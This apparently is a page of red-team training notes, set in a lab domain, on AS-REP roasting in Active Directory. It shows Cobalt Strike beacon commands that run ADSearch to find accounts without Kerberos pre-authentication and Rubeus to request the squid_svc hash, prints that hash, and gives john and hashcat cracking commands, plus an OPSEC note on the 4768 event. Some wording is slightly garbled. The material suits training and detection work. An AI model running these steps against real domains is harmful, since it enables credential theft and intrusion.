ASREP Roasting | What is this changing

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password. This configuration is enabled on the User Object and is often seen on accounts that are associated with Linux systems.

As with kerberoasting, we don't want to asreproast every account in the domain.

Use --format=krb5asrep --wordlist=wordlist squid_svc for john or -a 0 -m 18200 squid_svc wordlist for hashcat.

OPSEC ASREPRoasting with will generate a 4768 event with RC4 encryption and a preauth type of 0.

Last updated 5 days ago

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname [*] TOTAL NUMBER OF SEARCH RESULTS: 1 [+] cn : Squid Proxy [+] distinguishedname : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io [+] samaccountname : squid_svc

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap [*] SamAccountName : squid_svc [*] DistinguishedName : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Building AS-REQ (w/o preauth) for: 'dev.cyberbotic.io\squid_svc' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$squid_svc@dev.cyberbotic.io:BEDE491E0C9B3E932F9B4DF274AB059B$0947A85824870A9EA0B2C832B30D8B99BDA99F9451E9EB14AA0D9566674B32A10BE4954E6FB15DED54462D4AAAAE28DFB08C83EF0608DA6EEB9A08DBC79C06099D2B366BA5402A0ED60545B92B17882557CBB0FC700309751C51AF33F25A3103FA67DAAD9AD2154FE4171FBEFBE725AA1311CE50EFB8B87FF1BBCF5E97C496E08BA3CC4CA4F59820C4C27251686658C9F7EE52B43ED5A969A02273510AC7CCFB5DFE61E7A9D72E10B81E7B3ACBFDA0F3F058791E9A87D990871961D3BD9AEB40B9D0A1260094B17DCB8114DDBB19B5C2031F2906E527F96F1AFA62D907570E39E047659532F1FA043371DDF8D7FB9A5E5369A889A7BC